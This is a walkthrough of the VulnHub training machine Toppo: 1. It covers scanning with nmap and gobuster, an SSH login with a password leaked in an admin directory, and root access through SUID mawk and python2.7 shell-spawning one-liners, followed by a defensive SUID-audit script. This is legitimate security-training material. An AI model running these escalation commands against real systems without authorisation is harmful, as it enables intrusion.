Toppo: 1 || VulnHub Complete Walkthrough

In this article, we are going to tackle a vulnerable machine of easy difficulty that we have downloaded from VulnHub.

Toppo: 1

Toppo: 1 is a vulnerable virtual machine available on Vulnhub, designed for penetration testing and cybersecurity learning purposes. It provides a hands-on opportunity to practice various penetration testing techniques and enhance your skills in identifying and exploiting vulnerabilities in a controlled environment. By exploring Toppo: 1, you can gain practical experience in security assessment and learn how to secure systems against common attacks.




Once you have downloaded it, you need to set up the server.


Setting Up

It is pretty easy: you can set up the server within VirtualBox. Follow the steps below to set it up.

1. Extract the zip file which has been downloaded from VulnHub. 

2. As this file is in the ".vmdk" format, we need to create a new virtual machine.

  • Name: Toppo
  • Type: Linux
  • Version: Other Linux (64-bit)

3. Click next and allocate RAM size for your Virtual Machine and click on Next. 

4. Now, select “Use an existing Virtual Hard disk file” and import the VMDK file that we have previously extracted.

5. Once you are done with these, click on Settings and change the network adapter to the host-only adapter.

Make sure your Kali Linux machine, from which you perform the attack, and your vulnerable machine are on the same network.

Once you are done with the setup, let's start the virtual machines.

As you can notice, our vulnerable machine is ready, and we have a login screen that prompts for a username and password.


Enumeration

Let's discover the IP address of the running server by using NetDiscover:

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.180.0/16   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.162.1   0a:00:27:00:00:07      1      60  Unknown vendor
 192.168.162.2   08:00:27:3c:9f:81      1      60  PCS Systemtechnik GmbH
 192.168.162.4   08:00:27:7c:c8:14      2     120  PCS Systemtechnik GmbH

From the scan, we have discovered our target IP address, which is 192.168.162.4.

Now, let's perform a network scan to detect which ports are open.


Conducting Network Scans with Nmap

Network scanning is an essential part of the enumeration process. It gives us a better understanding of the attack surface so that we can design targeted tests.

As in most cases, we are going to use the famous Nmap tool with the following switches:

  • -sC: performs a script scan using the default set of scripts.
  • -sV: enables version detection, which reports what software version is running on each open port.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV 192.168.162.4
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-05 05:48 EDT
Nmap scan report for 192.168.162.4
Host is up (0.00080s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
|   2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|   256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_  256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Clean Blog - Start Bootstrap Theme
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          42448/udp6  status
|   100024  1          45225/udp   status
|   100024  1          49713/tcp6  status
|_  100024  1          56828/tcp   status
MAC Address: 08:00:27:7C:C8:14 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.95 seconds

From the network scan, we have spotted three open ports.

  • Port 22/TCP runs an SSH service, which means that if we have valid credentials it will be easy to log in to the server.
  • Port 80/TCP runs an HTTP service, which indicates that a (potentially vulnerable) website is being hosted.
  • The last one is Port 111/TCP running the RPC bind service, which does not seem useful for gaining access to the server.


Web Application Enumeration and Directory Discovery with Gobuster

So let’s take a look at the web content running on Port 80. To look at the contents ourselves, we can open a web browser of our choice, and navigate to the target's IP address in the URL bar at the top of the window.

The running website appears to have been built with Bootstrap. After analysing it, there is nothing to enumerate on the webpage itself, but there may be hidden or hard-to-reach directories and pages, which we can find through directory busting.

Using gobuster as our tool of choice, we can use the following switches to get fast, accurate results:

  • dir: specifies the mode of enumeration (directory brute-forcing),
  • -u: specifies the target URL, and
  • -w: specifies the path of the wordlist.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.162.4/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.162.4/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/05 05:58:57 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 292]
/.htaccess            (Status: 403) [Size: 297]
/.htpasswd            (Status: 403) [Size: 297]
/admin                (Status: 301) [Size: 314] [--> http://192.168.162.4/admin/]
/css                  (Status: 301) [Size: 312] [--> http://192.168.162.4/css/]  
/img                  (Status: 301) [Size: 312] [--> http://192.168.162.4/img/]  
/index.html           (Status: 200) [Size: 6437]                                 
/js                   (Status: 301) [Size: 311] [--> http://192.168.162.4/js/]   
/LICENSE              (Status: 200) [Size: 1093]                                 
/mail                 (Status: 301) [Size: 313] [--> http://192.168.162.4/mail/] 
/manual               (Status: 301) [Size: 315] [--> http://192.168.162.4/manual/]
/server-status        (Status: 403) [Size: 301]                                   
/vendor               (Status: 301) [Size: 315] [--> http://192.168.162.4/vendor/]
                                                                                  
===============================================================
2022/09/05 05:59:03 Finished
===============================================================

As a result of directory busting, we obtained an admin page. Let's dig into this directory and find out if there is any sensitive information that might help us gain a foothold.


Foothold

From the admin page, we obtain a text file that contains a password.

Let's attempt to log in to the server with the help of an SSH client.


Establishing SSH Connection

To establish an SSH connection, we need a username and a password. From the note, we have obtained a password. If you look at it carefully, you will notice that a username is also embedded within the password.

Let’s have a look. Open a terminal and run the following command:

┌──(kali㉿kali)-[~]
└─$ ssh ted@192.168.162.4
ted@192.168.162.4's password: 12345ted123

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Sep  5 06:04:07 2022 from 192.168.162.5
ted@Toppo:~$

As you can notice, we logged in successfully. Now let's move on to post-exploitation and try to get root access.


Privilege Escalation

The next step is escalating to the root user in order to gain the highest privileges on the system. Let's run "uname -a" to display the system information; the kernel version on this Debian release does not appear to be vulnerable, so we will look elsewhere.

ted@Toppo:~$ uname -a
Linux Toppo 3.16.0-4-586 #1 Debian 3.16.51-3 (2017-12-13) i686 GNU/Linux
ted@Toppo:~$

Now, run the following command to enumerate all binaries that have the SUID permission set.

SUID (Set Owner User ID) is a special file permission for executable files which lets other users run the file with the effective permissions of the file's owner, so a SUID binary owned by root runs as root regardless of who invokes it.

ted@Toppo:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount
ted@Toppo:~$

As you can see, this command dumped all system binaries that have the SUID permission (marked in green in the screenshot). Two of them stand out: /usr/bin/mawk and /usr/bin/python2.7 are interpreters, which can execute arbitrary commands and therefore should never be SUID root.
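As an added example (not part of the original walkthrough), the following POSIX shell script audits a list of SUID binaries against a baseline and flags the two interpreters that the methods below abuse; the baseline and the sample input are constructed from the find output above, and the extra path /usr/local/bin/custom-tool is made up to show the warning case.

```shell
#!/bin/sh
# Added example (not from the walkthrough): audit SUID binaries against a
# baseline and flag anything unexpected. Interpreters and shells (mawk,
# python, ...) must never carry SUID, since they run arbitrary code as owner.

# Baseline of SUID files expected on this Debian host. Constructed here from
# the walkthrough's find output minus the two interpreters it should not have.
BASELINE='/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount'

# audit_suid: read one SUID path per line on stdin; print nothing for
# baseline entries, CRITICAL for interpreters/shells, WARN for other extras.
audit_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        printf '%s\n' "$BASELINE" | grep -qxF -- "$path" && continue
        case "${path##*/}" in
            *awk*|python*|perl*|ruby*|php*|bash|sh|dash|vi|vim|nano)
                printf 'CRITICAL shell-capable SUID: %s\n' "$path" ;;
            *)
                printf 'WARN unexpected SUID: %s\n' "$path" ;;
        esac
    done
}

# Sample input constructed from the walkthrough's find output, plus one
# made-up extra path to show the WARN case.
SAMPLE='/sbin/mount.nfs
/usr/bin/python2.7
/usr/bin/mawk
/bin/su
/usr/local/bin/custom-tool'

# On a live host: find / -perm -u=s -type f 2>/dev/null | audit_suid
printf '%s\n' "$SAMPLE" | audit_suid
```

Run periodically (or from a configuration-management check), a non-empty report is the signal that something granted SUID to a binary that should not have it.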


SUID Binary Privilege Escalation

In order to gain root access, there are two methods.


Method 1: Using MAWK

MAWK is an interpreter for the AWK programming language. The AWK language is useful for manipulating data files, text retrieval and processing, and prototyping and experimenting with algorithms.

Because the mawk binary is SUID root, running the following command through it gives us a root shell. You can then read the root flag from the root directory to complete the challenge.

ted@Toppo:~$ mawk 'BEGIN {system("/bin/sh")}'
# cat /root/flag.txt
_________
|  _   _  |
|_/ | | \_|.--.   _ .--.   _ .--.    .--.
    | |  / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \
   _| |_ | \__. | | \__/ | | \__/ || \__. |
  |_____| '.__.'  | ;.__/  | ;.__/  '.__.'
                 [__|     [__|

Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}


Method 2: Using “Python 2.7”

Since python2.7 is also SUID root, you just need to run the following command to spawn an interactive root shell.

ted@Toppo:~$ python2.7 -c "import pty;pty.spawn('/bin/sh')"
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt
_________
|  _   _  |
|_/ | | \_|.--.   _ .--.   _ .--.    .--.
    | |  / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \
   _| |_ | \__. | | \__/ | | \__/ || \__. |
  |_____| '.__.'  | ;.__/  | ;.__/  '.__.'
                 [__|     [__|

Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}



In this way, you can compromise vulnerable machines of this type. We have successfully captured the root flag, and the challenge is complete.
